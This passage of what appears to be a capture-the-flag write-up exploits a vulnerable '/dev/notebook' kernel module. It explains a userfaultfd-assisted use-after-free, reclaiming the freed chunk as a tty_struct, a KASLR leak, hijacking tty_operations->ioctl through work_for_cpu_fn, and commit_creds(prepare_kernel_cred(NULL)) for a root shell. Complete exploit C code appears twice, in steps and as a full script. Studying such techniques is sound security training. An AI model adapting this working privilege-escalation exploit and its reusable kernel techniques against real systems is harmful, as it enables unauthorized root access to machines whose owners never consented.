if ( copy_from_user((userarg *)note, buf, size) )
printk("[x] copy from user error.\n", buf);
else
printk("[*] Write success.\n", buf);
return 0;
}
}
Exploitation
Building a UAF with userfaultfd
Note that noteedit uses krealloc to reallocate the object and then calls copy_from_user to copy data from user space:

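So we can allocate a note of a chosen size, start an edit thread that frees it through krealloc(0), and stall that thread right there with userfaultfd. At this point the object pointer in the notebook array has not been cleared and still refers to the freed object, so we only need to get that memory reallocated as some other kernel structure to complete the UAF.
Next we pick the victim struct. We go with the classic tty_struct: opening /dev/ptmx is enough to obtain one.
Leaking a kernel address
Since the challenge lets us read a chunk, we can leak the kernel base directly through the tty_operations pointer in tty_struct, which is normally initialized to the global ptm_unix98_ops or pty_unix98_ops.
With kaslr enabled the kernel is still shifted at page granularity, so the low three hex digits of the tty_operations address tell us whether it is ptm_unix98_ops or pty_unix98_ops.
Both are static constants, so they can be found in the vmlinux symbol table and their distance from the base is fixed (just read it from /proc/kallsyms):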
static const struct tty_operations ptm_unix98_ops = {
    .lookup = ptm_unix98_lookup,
    .install = pty_unix98_install,
    .remove = pty_unix98_remove,
    .open = pty_open,
    .close = pty_close,
    .write = pty_write,
    .write_room = pty_write_room,
    .flush_buffer = pty_flush_buffer,
    .chars_in_buffer = pty_chars_in_buffer,
    .unthrottle = pty_unthrottle,
    .ioctl = pty_unix98_ioctl,
    .compat_ioctl = pty_unix98_compat_ioctl,
    .resize = pty_resize,
    .cleanup = pty_cleanup,
    .show_fdinfo = pty_show_fdinfo,
};
static const struct tty_operations pty_unix98_ops = {
    .lookup = pts_unix98_lookup,
    .install = pty_unix98_install,
    .remove = pty_unix98_remove,
    .open = pty_open,
    .close = pty_close,
    .write = pty_write,
    .write_room = pty_write_room,
    .flush_buffer = pty_flush_buffer,
    .chars_in_buffer = pty_chars_in_buffer,
    .unthrottle = pty_unthrottle,
    .set_termios = pty_set_termios,
    .start = pty_start,
    .stop = pty_stop,
    .cleanup = pty_cleanup,
};
Note that the module's read and write functions use the size stored in the notebook array, and that size is set to 0 when we build the UAF through krealloc(0), so we have to set it back to a non-zero value.
noteadd() modifies the size in notebook first and only then calls copy_from_user(), which gives us another opening for userfaultfd: we use noteadd() to set size back to a non-zero value and stall it with userfaultfd (otherwise our UAF object pointer would be overwritten by the newly allocated object)
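The low-12-bit comparison used to tell the two ops tables apart can be written as a small function. A minimal sketch: the two addresses are the no-KASLR values this write-up uses for the challenge kernel (they are meaningless for any other build), and kaslr_offset_from_tty_ops is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

/* No-KASLR addresses for this challenge kernel, as used later in the exploit. */
#define PTM_UNIX98_OPS 0xffffffff81e8e440ULL
#define PTY_UNIX98_OPS 0xffffffff81e8e320ULL

/* KASLR slides the kernel by whole pages, so the low 12 bits of a leaked
 * pointer survive and identify which symbol was leaked. */
static uint64_t kaslr_offset_from_tty_ops(uint64_t leaked_ops)
{
    uint64_t low = leaked_ops & 0xfff;

    assert(low == (PTM_UNIX98_OPS & 0xfff) || low == (PTY_UNIX98_OPS & 0xfff));
    if (low == (PTY_UNIX98_OPS & 0xfff))
        return leaked_ops - PTY_UNIX98_OPS;
    return leaked_ops - PTM_UNIX98_OPS;
}
```

Adding the returned offset to any other no-KASLR symbol address gives that symbol's address at run time.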
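Hijacking tty_operations, controlling kernel execution flow, and stabilizing the exploit with work_for_cpu_fn()
Since the challenge lets us write to a chunk, we can overwrite tty_struct->tty_operations and then operate on the tty (read, write, ioctl and so on, each of which calls the matching function pointer in the table) to hijack kernel execution flow. notegift() also hands us the addresses of the objects stored in notebook for free, so we can place the fake tty_operations directly in a note.
Now for privilege escalation. As usual we want commit_creds(prepare_kernel_cred(NULL)), but it is hard to do that in a single step, so we run it in stages and keep the intermediate result. Here we use work_for_cpu_fn(), which exists in every kernel built with multi-core support and is defined in kernel/workqueue.c:
struct work_for_cpu {
    struct work_struct work;
    long (*fn)(void *);
    void *arg;
    long ret;
};
static void work_for_cpu_fn(struct work_struct *work)
{
    struct work_for_cpu *wfc = container_of(work, struct work_for_cpu, work);
    wfc->ret = wfc->fn(wfc->arg);
}
This code is part of the Linux kernel workqueue mechanism. Its purpose is to wrap a function call as an asynchronous task, run it in a suitable kernel context, and store its return value. The function can be read as:
static void work_for_cpu_fn(size_t *args)
{
    args[6] = ((size_t (*)(size_t)) args[4])(args[5]);
}
That is, the value at rdi + 0x20 is called as a function pointer with the value at rdi + 0x28 as its argument, and the return value is stored at rdi + 0x30. The first argument of most function pointers in tty_operations is the tty_struct, which we control, so we can conveniently run prepare_kernel_cred and commit_creds in separate calls without worrying about a KPTI bypass, and simply return to user space normally to get a stable privilege escalation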
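The word-indexed view of work_for_cpu_fn can be tried out in user space. This is a model under assumptions: a 64-bit target where size_t is 8 bytes, so args[4], args[5] and args[6] sit at offsets 0x20, 0x28 and 0x30; work_for_cpu_fn_model and demo_double are hypothetical names standing in for the kernel function and for prepare_kernel_cred / commit_creds.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef long (*wfc_fn_t)(void *);

/* User-space model: call the pointer stored in word 4 with word 5 as its
 * argument and store the result in word 6. */
static void work_for_cpu_fn_model(size_t *args)
{
    wfc_fn_t fn = (wfc_fn_t)(uintptr_t)args[4];

    assert(fn != NULL);
    args[6] = (size_t)fn((void *)(uintptr_t)args[5]);
}

/* Stand-in target function for the demonstration. */
static long demo_double(void *arg)
{
    return (long)((uintptr_t)arg * 2);
}
```

In the exploit the same three slots of the fake tty_struct are filled first with prepare_kernel_cred and NULL, then with commit_creds and the value read back from slot 6.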
1. get a tty-size object
The following script requests a chunk of tty_struct size:
// gcc exploit.c -static -masm=intel -g -o exploit
#include "kpwn.h"
#define ptm_unix98_ops 0xffffffff81e8e440
#define pty_unix98_ops 0xffffffff81e8e320
#define commit_creds 0xffffffff810a9b40
#define work_for_cpu_fn 0xffffffff8109eb90
#define prepare_kernel_cred 0xffffffff810a9ef0
#define TTY_STRUCT_SIZE 0x2e0
#define NOTE_NUM 0x10
struct chunk {
size_t index;
size_t size;
char *buf;
};
struct Notebook{
void *ptr;
size_t size;
};
int note_fd;
sem_t evil_add_sem, evil_edit_sem;
char *uffd_buf;
char temp_page[0x1000] = { "arttnba3" };
void add(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
ioctl(note_fd, 0x100, &note);
};
void delete(size_t index)
{
struct chunk note = {
.index = index,
};
ioctl(note_fd, 0x200, &note);
};
void edit(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
ioctl(note_fd, 0x300, &note);
};
void gift(void *buf)
{
struct chunk note = {
.buf = buf,
};
ioctl(note_fd, 0x64, &note);
};
ssize_t noteRead(int idx, void *buf)
{
return read(note_fd, buf, idx);
}
ssize_t noteWrite(int idx, void *buf)
{
return write(note_fd, buf, idx);
}
void* fixSizeByAdd(void *args)
{
sem_wait(&evil_add_sem);
add(0, 0x60, uffd_buf);
return NULL;
}
void* constructUAF(void * args)
{
sem_wait(&evil_edit_sem);
edit(0, 0, uffd_buf);
return NULL;
}
int main() {
struct Notebook kernel_notebook[NOTE_NUM];
int tty_fd;
struct tty_operations fake_tty_ops;
size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100];
pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread;
size_t tty_struct_addr, fake_tty_ops_addr;
save_status();
bind_core(0);
sem_init(&evil_add_sem, 0, 0);
sem_init(&evil_edit_sem, 0, 0);
note_fd = open("/dev/notebook", O_RDWR);
if (note_fd < 0) {
printf(ERROR_MSG("Failed open /dev/notebook"));
exit(-1);
}
log_success("open /dev/notebook\n");
puts("[*] register userfaultfd...");
uffd_buf = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
register_userfaultfd_for_thread_stucking(&uffd_monitor_thread, uffd_buf, 0x1000);
/* get a tty-size object */
puts("[*] allocating tty_struct-size object...");
add(0,0x10,"alpha-win-kernel");
edit(0,TTY_STRUCT_SIZE,"alpha-win-kernel");
return 0;
}
Result:
After the first add:

After edit changes the chunk size:

2. UAF by userfaultfd.
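From here on we combine the race condition with userfaultfd:
We first declare three thread handle variables that stand for three concurrently running threads.
Then a call such as
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL); creates a new thread that starts executing at constructUAF. The two calls below make noteEdit(size=0) and noteAdd(...) run in the same time window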
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL);
pthread_create(&add_fix_size_thread, NULL, fixSizeByAdd, NULL);
Next, let us look at what fixSizeByAdd() and constructUAF() do:
constructUAF() waits on a semaphore (evil_edit_sem). Once woken, it calls edit(0, 0, uffd_buf), which triggers krealloc(ptr, 0) → kfree; execution then continues into copy_from_user(uffd_buf) → page fault → stalled
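void* constructUAF(void * args)
{
sem_wait(&evil_edit_sem);
edit(0, 0, uffd_buf);
return NULL;
}
fixSizeByAdd() also waits for its semaphore first. Once woken it immediately calls add, which sets the size of entry 0 back to a non-zero value and then stalls in copy_from_user as well, before it can overwrite the dangling pointer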
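void* fixSizeByAdd(void *args)
{
sem_wait(&evil_add_sem);
add(0, 0x60, uffd_buf);
return NULL;
}
Why do edit and add stall when they execute copy_from_user(&name, content, 0x100);?
Because copy_from_user() triggers a page fault when it touches the user page behind uffd_buf, and that page is registered with userfaultfd in MISSING mode. The kernel does not resolve the fault itself but hands it to user space, so the thread executing in the kernel stays blocked until the userfaultfd handler explicitly resolves the fault.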
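The ordering role of the two semaphores can be reproduced without the kernel module. A minimal sketch, with stand-ins for the real calls: edit_worker and add_worker are hypothetical and only record a letter where the exploit would call edit(0, 0, uffd_buf) and add(0, 0x60, uffd_buf). pthread_join is used here because these workers return; the exploit uses sleep(1) instead because its threads stay stalled.

```c
#include <assert.h>
#include <pthread.h>
#include <semaphore.h>

static sem_t edit_sem, add_sem;
static pthread_mutex_t log_lock = PTHREAD_MUTEX_INITIALIZER;
static char run_log[2];
static int run_len;

/* Append one letter to the shared log under a mutex. */
static void record(char who)
{
    pthread_mutex_lock(&log_lock);
    assert(run_len < 2);
    run_log[run_len++] = who;
    pthread_mutex_unlock(&log_lock);
}

static void *edit_worker(void *arg)
{
    (void)arg;
    sem_wait(&edit_sem);   /* parked until main posts edit_sem */
    record('E');           /* stand-in for the edit call */
    return NULL;
}

static void *add_worker(void *arg)
{
    (void)arg;
    sem_wait(&add_sem);    /* parked until main posts add_sem */
    record('A');           /* stand-in for the add call */
    return NULL;
}

/* Returns 1 if the edit stand-in ran strictly before the add stand-in. */
static int run_edit_then_add(void)
{
    pthread_t edit_thr, add_thr;

    run_len = 0;
    if (sem_init(&edit_sem, 0, 0) != 0 || sem_init(&add_sem, 0, 0) != 0)
        return 0;
    /* Creation order does not matter: both threads block immediately. */
    if (pthread_create(&add_thr, NULL, add_worker, NULL) != 0)
        return 0;
    if (pthread_create(&edit_thr, NULL, edit_worker, NULL) != 0)
        return 0;
    sem_post(&edit_sem);             /* release the edit thread first */
    pthread_join(edit_thr, NULL);
    sem_post(&add_sem);              /* then release the add thread */
    pthread_join(add_thr, NULL);
    sem_destroy(&edit_sem);
    sem_destroy(&add_sem);
    return run_len == 2 && run_log[0] == 'E' && run_log[1] == 'A';
}
```

Whatever order the threads are created in, the posts decide the order in which the two operations enter the kernel.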
/* UAF by userfaultfd. */
puts("[*] constructing UAF on tty_struct...");
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL);// blocks at sem_wait(&evil_edit_sem);
pthread_create(&add_fix_size_thread, NULL, fixSizeByAdd, NULL);// blocks at sem_wait(&evil_add_sem);
sem_post(&evil_edit_sem);
sleep(1);
sem_post(&evil_add_sem);
sleep(1);
Result:

3. leak kernel_base by tty_struct
Allocate a tty_struct object. Since we have just freed a chunk of tty_struct size, this allocation gets that chunk back, and with it the UAF is in place
/* leak kernel_base by tty_struct */
puts("[*] leaking kernel_base by tty_struct");
// Allocate a tty_struct object; we just freed a chunk of tty_struct size, so this allocation takes that chunk back
tty_fd = open("/dev/ptmx", O_RDWR| O_NOCTTY);
noteRead(0, orig_tty_struct_data);
if (*(int*) orig_tty_struct_data != 0x5401) {
log_error("failed to hit the tty_struct!");
}
tty_ops = orig_tty_struct_data[3];
kernel_offset = ((tty_ops & 0xfff) == (pty_unix98_ops & 0xfff)
? (tty_ops - pty_unix98_ops) : tty_ops - ptm_unix98_ops);
kernel_base += kernel_offset;
log_success("Kernel offset:0x%lx", kernel_offset);
log_success("Kernel base: 0x%lx", kernel_base);
Result:

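4. construct fake tty_ops
The following builds a fake tty_ops. Why hijack ioctl in tty_operations rather than write: the member around tty_struct[4] includes the semaphore ldisc_sem, and on the write path its value is changed before execution reaches work_for_cpu_fn
Note that the ioctl in tty_operations is not called directly; several checks run first, so we have to pass suitable arguments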
log_info("constructing fake tty_ops...");
fake_tty_ops.ioctl = kernel_offset + work_for_cpu_fn;
add(1,0x60,temp_page);
edit(1,sizeof(struct tty_operations),temp_page);
noteWrite(1,&fake_tty_ops);
Result:

5. get kernel addr
The following snippet leaks the kernel addresses of the two objects:
/* get kernel addr of tty_struct and tty_ops by gift */
log_info("leaking kernel heap addr by gift...");
gift(&kernel_notebook);
tty_struct_addr = (size_t) kernel_notebook[0].ptr;
fake_tty_ops_addr = (size_t) kernel_notebook[1].ptr;
log_success("tty_struct_addr = 0x%lx",tty_struct_addr);
log_success("fake_tty_ops_addr = 0x%lx",fake_tty_ops_addr);
Result:

6. prepare_kernel_cred(NULL)
The code below goes through the following call chain:
sys_ioctl
└─ do_vfs_ioctl
└─ tty_ioctl
└─ tty->ops->ioctl(tty, cmd, arg)
↑
this is already the ops table you forged
/* prepare_kernel_cred(NULL) */
log_info("trigger commit_creds(prepare_kernel_cred(NULL)) and fix tty...");
memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
fake_tty_struct_data[3] = fake_tty_ops_addr;
fake_tty_struct_data[4] = kernel_offset + prepare_kernel_cred;
fake_tty_struct_data[5] = 0; /* NULL argument for prepare_kernel_cred */
log_info("fake_tty_struct_data is =");
print_binary(&fake_tty_struct_data,0x40);
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);
Result:


As shown, the return value of the call is saved into this field

Compare with struct tty_struct as defined in include/linux/tty.h:
struct tty_struct {
int magic;
struct kref kref;
struct device *dev;
struct tty_driver *driver;
const struct tty_operations *ops;
int index;
/* Protects ldisc changes: Lock tty not pty */
struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
spinlock_t ctrl_lock;
spinlock_t flow_lock;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
struct termiox *termiox; /* May be NULL for unsupported */
char name[64];
struct pid *pgrp; /* Protected by ctrl lock */
struct pid *session;
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */
unsigned long stopped:1, /* flow_lock */
flow_stopped:1,
unused:BITS_PER_LONG - 2;
int hw_stopped;
unsigned long ctrl_status:8, /* ctrl_lock */
packet:1,
unused_ctrl:BITS_PER_LONG - 9;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;
struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work;
struct tty_port *port;
} __randomize_layout;
/* Each of a tty's open files has private_data pointing to tty_file_private */
struct tty_file_private {
struct tty_struct *tty;
struct file *file;
struct list_head list;
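};
According to the original note, the field that gets overwritten is struct tty_ldisc *ldisc;. With the offsets used above the return value lands at offset 0x30 of tty_struct, so which member that is depends on the struct layout of the kernel build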
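The word indexes used by the exploit (orig_tty_struct_data[3] for ops, slots 4 to 6 for the work_for_cpu_fn trick) can be cross-checked against the head of the struct. A sketch under assumptions: x86-64 LP64, struct kref as a single 4-byte counter, a long as the first member of struct ld_semaphore, and no layout randomization. struct tty_head_model is a hypothetical stand-in, not the kernel definition.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for the first members of struct tty_struct. */
struct tty_head_model {
    int magic;             /* 0x00: TTY_MAGIC, 0x5401 */
    int kref;              /* 0x04: refcount wrapped by struct kref */
    void *dev;             /* 0x08 */
    void *driver;          /* 0x10 */
    const void *ops;       /* 0x18 */
    int index;             /* 0x20, padded to 8 bytes */
    long ldisc_sem_count;  /* 0x28: assumed first member of ldisc_sem */
};

/* Convert a byte offset into an index into a size_t array. */
static size_t word_index(size_t byte_offset)
{
    assert(byte_offset % sizeof(size_t) == 0);
    return byte_offset / sizeof(size_t);
}
```

Under these assumptions ops is word 3, which matches the leak in step 3, and words 4 and 5 cover index and the start of ldisc_sem.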
7. commit_creds(&root_cred) and root shell
The following code performs commit_creds(&root_cred)
noteRead(0, fake_tty_struct_data);
fake_tty_struct_data[4] = kernel_offset + commit_creds;
fake_tty_struct_data[5] = fake_tty_struct_data[6];
fake_tty_struct_data[6] = orig_tty_struct_data[6];
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);
Finally, just call system("/bin/sh")
Result:

The complete script:
// gcc exploit.c -static -masm=intel -g -o exploit
#include "kpwn.h"
#define ptm_unix98_ops 0xffffffff81e8e440
#define pty_unix98_ops 0xffffffff81e8e320
#define commit_creds 0xffffffff810a9b40
#define work_for_cpu_fn 0xffffffff8109eb90
#define prepare_kernel_cred 0xffffffff810a9ef0
#define TTY_STRUCT_SIZE 0x2e0
#define NOTE_NUM 0x10
struct chunk {
size_t index;
size_t size;
char *buf;
};
struct Notebook{
void *ptr;
size_t size;
};
int note_fd;
sem_t evil_add_sem, evil_edit_sem;
char *uffd_buf;
char temp_page[0x1000] = { "arttnba3" };
void add(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
ioctl(note_fd, 0x100, &note);
};
void delete(size_t index)
{
struct chunk note = {
.index = index,
};
ioctl(note_fd, 0x200, &note);
};
void edit(size_t index,size_t size,char *buf)
{
struct chunk note = {
.index = index,
.size = size,
.buf = buf,
};
ioctl(note_fd, 0x300, &note);
};
void gift(void *buf)
{
struct chunk note = {
.buf = buf,
};
ioctl(note_fd, 0x64, &note);
};
ssize_t noteRead(int idx, void *buf)
{
return read(note_fd, buf, idx);
}
ssize_t noteWrite(int idx, void *buf)
{
return write(note_fd, buf, idx);
}
void* fixSizeByAdd(void *args)
{
sem_wait(&evil_add_sem);
add(0, 0x60, uffd_buf);
return NULL;
}
void* constructUAF(void * args)
{
sem_wait(&evil_edit_sem);
edit(0, 0, uffd_buf);
return NULL;
}
int main() {
struct Notebook kernel_notebook[NOTE_NUM];
int tty_fd;
struct tty_operations fake_tty_ops;
size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100];
pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread;
size_t tty_struct_addr, fake_tty_ops_addr;
save_status();
bind_core(0);
sem_init(&evil_add_sem, 0, 0);
sem_init(&evil_edit_sem, 0, 0);
note_fd = open("/dev/notebook", O_RDWR);
if (note_fd < 0) {
printf(ERROR_MSG("Failed to open /dev/notebook"));
exit(-1);
}
log_success("opened /dev/notebook\n");
puts("[*] register userfaultfd...");
uffd_buf = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
register_userfaultfd_for_thread_stucking(&uffd_monitor_thread, uffd_buf, 0x1000);
/* get a tty-size object */
puts("[*] allocating tty_struct-size object...");
add(0,0x10,"alpha-win-kernel");
edit(0,TTY_STRUCT_SIZE,"alpha-win-kernel");
/* UAF by userfaultfd. */
puts("[*] constructing UAF on tty_struct...");
pthread_create(&edit_uaf_thread, NULL, constructUAF, NULL); // blocks at sem_wait(&evil_edit_sem)
pthread_create(&add_fix_size_thread, NULL, fixSizeByAdd, NULL); // blocks at sem_wait(&evil_add_sem)
// Post the semaphore so constructUAF resumes: krealloc(ptr, 0) frees the chunk in that thread, then copy_from_user(uffd_buf) faults and userfaultfd stalls it
sem_post(&evil_edit_sem);
sleep(1);
// Post the semaphore so fixSizeByAdd resumes and, inside the UAF window, allocates a new kmalloc object
sem_post(&evil_add_sem); // this rewrites the chunk's size without changing its pointer
sleep(1);
/* leak kernel_base by tty_struct */
puts("[*] leaking kernel_base by tty_struct");
// Allocate a tty_struct; a chunk of tty_struct size was just freed, so this open() gets that chunk back
tty_fd = open("/dev/ptmx", O_RDWR| O_NOCTTY);
noteRead(0, orig_tty_struct_data);
if (*(int*) orig_tty_struct_data != 0x5401) {
log_error("failed to hit the tty_struct!");
}
tty_ops = orig_tty_struct_data[3];
kernel_offset = ((tty_ops & 0xfff) == (pty_unix98_ops & 0xfff)
? (tty_ops - pty_unix98_ops) : tty_ops - ptm_unix98_ops);
kernel_base += kernel_offset;
log_success("Kernel offset:0x%lx", kernel_offset);
log_success("Kernel base: 0x%lx", kernel_base);
/* construct fake tty_ops */
log_info("constructing fake tty_ops...");
fake_tty_ops.ioctl = kernel_offset + work_for_cpu_fn;
add(1,0x60,temp_page);
edit(1,sizeof(struct tty_operations),temp_page);
noteWrite(1,&fake_tty_ops);
/* get kernel addr of tty_struct and tty_ops by gift */
log_info("leaking kernel heap addr by gift...");
gift(&kernel_notebook);
tty_struct_addr = (size_t) kernel_notebook[0].ptr;
fake_tty_ops_addr = (size_t) kernel_notebook[1].ptr;
log_success("tty_struct_addr = 0x%lx",tty_struct_addr);
log_success("fake_tty_ops_addr = 0x%lx",fake_tty_ops_addr);
/* prepare_kernel_cred(NULL) */
log_info("trigger commit_creds(prepare_kernel_cred(NULL)) and fix tty...");
memcpy(fake_tty_struct_data, orig_tty_struct_data, 0x2e0);
fake_tty_struct_data[3] = fake_tty_ops_addr;
fake_tty_struct_data[4] = kernel_offset + prepare_kernel_cred;
fake_tty_struct_data[5] = 0; /* arg = NULL */
log_info("fake_tty_struct_data is =");
print_binary(&fake_tty_struct_data,0x40);
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);
/* commit_creds(&root_cred) */
noteRead(0, fake_tty_struct_data);
fake_tty_struct_data[4] = kernel_offset + commit_creds;
fake_tty_struct_data[5] = fake_tty_struct_data[6];
// fake_tty_struct_data[6] = orig_tty_struct_data[6];
noteWrite(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);
/* pop root shell */
get_root_shell();
return 0;
}